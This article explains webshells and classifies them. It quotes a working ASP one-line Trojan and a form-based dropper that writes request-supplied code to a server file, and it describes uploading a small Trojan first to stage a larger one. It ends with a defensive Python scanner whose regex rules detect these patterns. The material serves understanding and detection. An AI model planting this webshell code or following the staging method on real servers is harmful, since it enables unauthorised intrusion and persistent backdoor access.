Research on Webshell Implementation and Hiding
1. What is a webshell
Introduction to webshell
As the name implies, "web" refers to the web server and "shell" is a script program written in a scripting language. A webshell is a web-based management tool that has the authority to operate the web server; it is also called webadmin. Website administrators generally use a webshell for website management, server management, and so on. However, because a webshell is so powerful (it can upload and download files, view the database, and even call system-related commands on the server, such as creating users or modifying and deleting files), it is commonly used by hackers. Through some upload method, hackers place their own webshell in a page directory of the web server and then intrude by visiting that page, or they insert a one-sentence Trojan and connect to it with related local tools to intrude on the server directly.
Classification of webshell
By script language, webshells can be divided into PHP script Trojans, ASP script Trojans, .NET-based script Trojans, and JSP script Trojans. Abroad, there are also dynamic web pages written in the Python scripting language, and of course there are webshells for them as well.
By function, webshells are also divided into large Trojans ("big horses") and small Trojans ("ponies"). A pony usually refers to a one-sentence Trojan, for example: <%eval request("pass")%>. This sentence is usually written into a document, the file is renamed to xx.asp, and it is then uploaded to the server. Here the eval method executes the value of request("pass") as code. The function of the request function is to bring in external content. This is equivalent to the client configuration of a Trojan horse. Server configuration (i.e. local configuration):
<form action=http://host path/TEXT.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")//Create stream object
lP.Open //Open
lP.Type=2 //Text mode
lP.CharSet="gb2312" //Character set
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newmm.asp"), 2 //Write the Trojan content to newmm.asp; 2 means overwrite an existing file
lP.Close //Close the object
set lP=nothing //Release the object
response.redirect "newmm.asp" //Turn to newmm.asp
</textarea>
<textarea name=newvalue cols=120 rows=10 width=45> (add content to generate Trojan horse)
</textarea>
<BR>
<center>
<input type=submit value=Submit>
Here, the Trojan is delivered by submitting the form. Specifically, the script defines an object lP, writes the content of newvalue as text (the content of newvalue is defined in a textarea), generates the ASP file by overwriting, and then runs that script. The value in the client represents the name of the form, and it must be the same as the form name in the POST submission of the server (local side), so the value here can be any string; it is equivalent to a password. However, this 'password' is in clear text and can be intercepted. The PHP one-sentence Trojan works on a similar principle; only the syntax differs because the language is different. This is the basic working principle of a pony.
A large Trojan works in a much simpler way. There is no split between client and server: scripting experts integrate the server side of the one-sentence Trojan directly into a single file. The large Trojan is uploaded through an upload vulnerability, its URL is copied and visited directly, and the penetration of the web server is carried out from that page. However, some websites place strict restrictions on uploaded files. Because a large Trojan has many functions, it is relatively large and is likely to exceed the website's upload limit. The size of a pony, by contrast, can be controlled (for example, by copying the code many times or by inserting the code into a garbled file), but a pony is more complicated to operate. One approach is to upload the pony first to get a webshell, and then upload the large Trojan to the server through the pony connection.
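For defenders, the one-sentence pattern and the padding trick described above suggest scanning script files by content, not by size. The following is an added example, not code from the original article; the rule names, extension list and sample byte strings are assumptions constructed for illustration.

```python
import os
import re

# Heuristic signatures for the patterns on this page (assumed rule names, not exhaustive).
RULES = {
    # ASP one-sentence Trojan: eval/execute fed directly from request input
    "asp_eval_request": re.compile(
        r"<%[^%]*?\b(?:eval|execute)\b\s*\(?\s*request\b", re.I | re.S),
    # PHP counterpart: eval/assert on a request superglobal
    "php_eval_input": re.compile(
        r"\b(?:eval|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    # Dropper body: ADODB.Stream writing request-supplied text to a file
    "asp_stream_dropper": re.compile(
        r"adodb\.stream.*?writetext\s+request\b.*?savetofile", re.I | re.S),
}
SCRIPT_EXTS = {".asp", ".asa", ".aspx", ".php"}  # assumed set of executable extensions

def scan_bytes(data: bytes) -> list:
    """Return the sorted names of rules that match anywhere in the content."""
    # latin-1 never fails to decode, so gb2312 text or garbled padding cannot hide ASCII keywords
    text = data.decode("latin-1")
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan_tree(root: str) -> dict:
    """Walk a web root and map each suspicious script path to its matched rules."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if os.path.splitext(fn)[1].lower() in SCRIPT_EXTS:
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    found = scan_bytes(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed samples (the first is the one-liner quoted in the article)
PONY = b'<%eval request("pass")%>'
PADDED = b"\x8f\xa1 filler " * 2000 + PONY  # size inflated with junk bytes
BENIGN = b'<% Response.Write Server.HTMLEncode(Request("q")) %>'

if __name__ == "__main__":
    for label, sample in [("pony", PONY), ("padded", PADDED), ("benign", BENIGN)]:
        print(label, scan_bytes(sample))
```

These signatures only catch the literal forms shown here; treat a hit as a lead for review, and extend SCRIPT_EXTS to whatever extensions the server is actually configured to execute.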